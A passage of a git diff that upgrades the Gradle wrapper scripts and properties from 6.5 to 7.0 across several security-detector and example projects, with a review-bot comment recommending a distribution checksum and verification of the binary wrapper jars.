@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/doyensec/detectors/kubernetes_rce_via_open_access/gradle/wrapper/gradle-wrapper.jar b/doyensec/detectors/kubernetes_rce_via_open_access/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/doyensec/detectors/kubernetes_rce_via_open_access/gradle/wrapper/gradle-wrapper.jar and b/doyensec/detectors/kubernetes_rce_via_open_access/gradle/wrapper/gradle-wrapper.jar differ diff --git a/doyensec/detectors/kubernetes_rce_via_open_access/gradle/wrapper/gradle-wrapper.properties b/doyensec/detectors/kubernetes_rce_via_open_access/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/doyensec/detectors/kubernetes_rce_via_open_access/gradle/wrapper/gradle-wrapper.properties +++ b/doyensec/detectors/kubernetes_rce_via_open_access/gradle/wrapper/gradle-wrapper.properties 
@@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/doyensec/detectors/kubernetes_rce_via_open_access/gradlew b/doyensec/detectors/kubernetes_rce_via_open_access/gradlew index fbd7c5158..1aa94a426 100755 --- a/doyensec/detectors/kubernetes_rce_via_open_access/gradlew +++ b/doyensec/detectors/kubernetes_rce_via_open_access/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
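Review bot: The `gradle-wrapper.properties` hunk for kubernetes_rce_via_open_access leaves the file without a `distributionSha256Sum` entry, so the downloaded `gradle-7.0-bin.zip` is accepted on the strength of the HTTPS URL alone. As far as I know, the added `validateDistributionUrl=true` concerns the URL rather than the archive contents. I would add `distributionSha256Sum=<SHA-256 of gradle-7.0-bin.zip, taken from Gradle's published release checksums>` directly below `distributionUrl`. The same applies to the properties hunks for selenium_grid_rce_via_exposed_server, example_calling_command and example_payload_framework_vuln_detector later in this diff. The accompanying `gradle-wrapper.jar` updates are binary and cannot be reviewed from the diff, so it is worth confirming they match the wrapper checksums Gradle publishes, ideally with a wrapper-validation step in CI.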
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/doyensec/detectors/kubernetes_rce_via_open_access/gradlew.bat b/doyensec/detectors/kubernetes_rce_via_open_access/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/doyensec/detectors/kubernetes_rce_via_open_access/gradlew.bat +++ b/doyensec/detectors/kubernetes_rce_via_open_access/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/doyensec/detectors/selenium_grid_rce_via_exposed_server/gradle/wrapper/gradle-wrapper.properties b/doyensec/detectors/selenium_grid_rce_via_exposed_server/gradle/wrapper/gradle-wrapper.properties index 8f9797cb5..d04736436 100644 --- a/doyensec/detectors/selenium_grid_rce_via_exposed_server/gradle/wrapper/gradle-wrapper.properties +++ b/doyensec/detectors/selenium_grid_rce_via_exposed_server/gradle/wrapper/gradle-wrapper.properties @@ -1,6 +1,6 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip networkTimeout=10000 validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME 
diff --git a/examples/example_calling_command/gradle/wrapper/gradle-wrapper.jar b/examples/example_calling_command/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/examples/example_calling_command/gradle/wrapper/gradle-wrapper.jar and b/examples/example_calling_command/gradle/wrapper/gradle-wrapper.jar differ diff --git a/examples/example_calling_command/gradle/wrapper/gradle-wrapper.properties b/examples/example_calling_command/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/examples/example_calling_command/gradle/wrapper/gradle-wrapper.properties +++ b/examples/example_calling_command/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/examples/example_calling_command/gradlew b/examples/example_calling_command/gradlew index fbd7c5158..1aa94a426 100755 --- a/examples/example_calling_command/gradlew +++ b/examples/example_calling_command/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr 